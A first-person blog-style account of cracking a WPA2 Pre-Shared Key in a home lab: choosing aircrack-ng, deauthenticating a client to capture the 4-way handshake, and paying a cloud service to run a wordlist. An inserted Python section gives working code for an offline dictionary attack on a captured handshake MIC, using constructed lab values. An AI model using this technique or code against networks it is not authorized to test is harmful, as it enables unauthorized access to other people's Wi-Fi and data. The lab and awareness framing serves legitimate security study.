Cyber-security is becoming a serious concern for small-business owners who maintain electronic medical records and/or customer payment information.
One area where a small-business owner can become vulnerable is their 802.11 Wi-Fi network.
And so I decided to investigate.
The first thing I did was to research tools for wireless cracking. I started out by reading a couple of books. The first was Cryptography: A Very Short Introduction by Fred Piper & Sean Murphy (to get a good refresher on the principles of cryptography). I also read Hacking Exposed Wireless by Johnny Cache. These two books gave me enough of the “basics” to point me in the right direction for Internet resources on the required software and hardware.
Next, I decided what kind of wireless network I wanted to crack. There are several authentication / encryption methods deployed in wireless networks today, such as WEP, WPA/WPA2 Pre-Shared Key, WPA2 Dynamic-Shared Key, and WPA2 Enterprise (802.1X). Everybody says WEP is easy to crack, so I thought I would start with that. However, I discovered that while the WEP key is in fact easier to recover than a WPA/WPA2 passphrase (it falls to a statistical attack on the captured IVs rather than a guessing attack), the preparation is more involved: the attack needs a large volume of captured traffic (roughly 20K-90K packets) before it succeeds, whereas WPA/WPA2-PSK only needs a single captured 4-way handshake. So in the interest of time, and also because WPA2 is more common, I decided to crack WPA/WPA2 Pre-Shared Key.
Next, I had to acquire the necessary hardware and software. Because of the number of variables (chipset, driver, monitor-mode and injection support), this task alone consumes hours upon hours of time (in total I probably had to invest 40 hours). There are many other blog posts written about this, so I won’t re-iterate what has already been written. With regard to software, I decided to use Kali Linux and the aircrack-ng suite.
Next, I set up a lab environment. I wanted a lab that would be as close to the real world as possible (I even “Googled” the most popular Wi-Fi passwords of 2013). And so I decided to use the Verizon Actiontec router that is supplied with almost every FiOS installation out there. I set up the router for 802.11g, WPA2 Pre-Shared Key…
Next, I associated my test laptop with this new wireless SSID…
I also decided to start a continuous ping to the Verizon wireless router on my test laptop. I then started up my cracking hardware / software and began the attack. I noticed packet loss on my test laptop during the deauthentication phase of the attack (aireplay-ng kicking the client off the network so that it re-associates and the handshake can be captured)…
Afterwards I took a look at the resulting PCAP file in Wireshark to verify that the WPA2 4-way (EAPOL-Key) handshake between my test laptop and the wireless router had been captured.
Capturing the traffic is one thing. Once you have successfully captured the authentication between the wireless client and the router, you now have to have a way to try candidate passwords until you find one that reproduces the MIC in the captured handshake. Each guess is deliberately expensive: WPA2-PSK derives the key with 4096 iterations of PBKDF2-HMAC-SHA1 over the passphrase and SSID, so a modern CPU core only manages a few thousand WPA2 candidates per second. With the enormous number of possibilities, this makes a normal CPU a poor choice for discovering a password.
That is why modern cracking systems offload the work from CPUs to Graphics Processing Units (GPUs), scaled together for distributed compute power. This allows us to compress years of compute time into minutes, hours or days. Thankfully, we can rent compute power today, such as Amazon Web Services (AWS), or we can use a cloud-based cracking service. I decided to use a cloud-based service: I logged into www.cloudcracker.com and uploaded my PCAP file for their analysis. They charged me a $17 fee to run the handshake against their large wordlist, but it is well worth it.
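To make the cracking step concrete, here is a small added example (my own code, not from the original post or from cloudcracker/aircrack-ng) that does offline what a cracking service does: it derives PMK → PTK → KCK for each candidate passphrase and checks it against the MIC of a captured EAPOL-Key message 2. The SSID, passphrase, MAC addresses, nonces and the EAPOL frame below are all constructed lab values, not a real capture; the frame layout and key derivation follow IEEE 802.11i for a WPA2/CCMP (key descriptor version 2, HMAC-SHA1) handshake.

```python
import hashlib
import hmac
import struct

# --- Constructed lab parameters (assumptions, NOT a real capture) ---
SSID = b"FiOS-LAB"
TRUE_PASSPHRASE = "password"             # what the lab AP is configured with
AP_MAC = bytes.fromhex("001122334455")   # authenticator address (AA)
STA_MAC = bytes.fromhex("66778899aabb")  # supplicant address (SPA)
ANONCE = bytes(range(32))                # nonce sent by the AP in message 1
SNONCE = bytes(range(32, 64))            # nonce sent by the client in message 2

# Offset of the 16-byte MIC inside the EAPOL frame built by build_eapol_msg2():
# 4-byte EAPOL header + type(1) + key info(2) + key len(2) + replay(8) + nonce(32) + IV(16) + RSC(8) + ID(8)
MIC_OFFSET = 81


def pmk_from_passphrase(passphrase: str, ssid: bytes) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    The 4096 iterations are what make every guess expensive."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid, 4096, 32)


def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: concatenate HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3."""
    out = b""
    for i in range(4):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion",
                     min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce)).
    Bytes 0..15 of the PTK are the KCK, the key that MICs the EAPOL frames."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf512(pmk, b"Pairwise key expansion", data)


def build_eapol_msg2(snonce: bytes, mic: bytes = bytes(16)) -> bytes:
    """Minimal EAPOL-Key frame for message 2 of the 4-way handshake (RSN, descriptor version 2)."""
    body = (
        b"\x02"                   # descriptor type: RSN (802.11i)
        + b"\x01\x0a"             # key information: version 2 (HMAC-SHA1), pairwise, MIC bit set
        + b"\x00\x10"             # key length 16 (CCMP)
        + b"\x00" * 7 + b"\x01"   # replay counter 1
        + snonce                  # 32-byte SNonce
        + bytes(16)               # key IV
        + bytes(8)                # key RSC
        + bytes(8)                # key ID
        + mic                     # 16-byte MIC (zero while computing it)
        + b"\x00\x00"             # key data length 0
    )
    return b"\x02\x03" + struct.pack(">H", len(body)) + body  # EAPOL version 2, type Key (3)


def compute_mic(kck: bytes, eapol: bytes) -> bytes:
    """Descriptor version 2: MIC = HMAC-SHA1(KCK, frame with the MIC field zeroed)[:16]."""
    zeroed = eapol[:MIC_OFFSET] + bytes(16) + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def crack(wordlist, ssid, aa, spa, anonce, snonce, eapol):
    """Offline dictionary attack: for each candidate, PMK -> PTK -> KCK -> MIC, compare with the capture."""
    target_mic = eapol[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, ssid)
        kck = derive_ptk(pmk, aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(compute_mic(kck, eapol), target_mic):
            return candidate
    return None


def make_lab_capture() -> bytes:
    """Build the 'captured' message 2 with a valid MIC under the lab passphrase (stands in for the PCAP)."""
    pmk = pmk_from_passphrase(TRUE_PASSPHRASE, SSID)
    kck = derive_ptk(pmk, AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    unsigned = build_eapol_msg2(SNONCE)
    return build_eapol_msg2(SNONCE, compute_mic(kck, unsigned))


# Constructed mini wordlist; a real service runs hundreds of millions of entries.
WORDLIST = ["123456", "letmein", "qwerty", "password", "iloveyou"]

if __name__ == "__main__":
    capture = make_lab_capture()
    print("recovered passphrase:", crack(WORDLIST, SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, capture))
```

Note that the MIC check only needs the two MAC addresses, the two nonces and one MIC-bearing EAPOL frame; that is why a single deauth-and-reconnect is enough for the capture, and why the rest of the attack is purely offline. Time a loop over `pmk_from_passphrase` on your own machine to see the per-guess cost that the 4096 PBKDF2 iterations impose.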
So once I paid the fee, they sent me an e-mail confirmation…
… and then another e-mail confirmation when they got started…
… and then another e-mail after they’ve cracked the password for you…
So basically, the offline cracking part of this attack took about 108 seconds to recover the most popular wireless password used in 2013.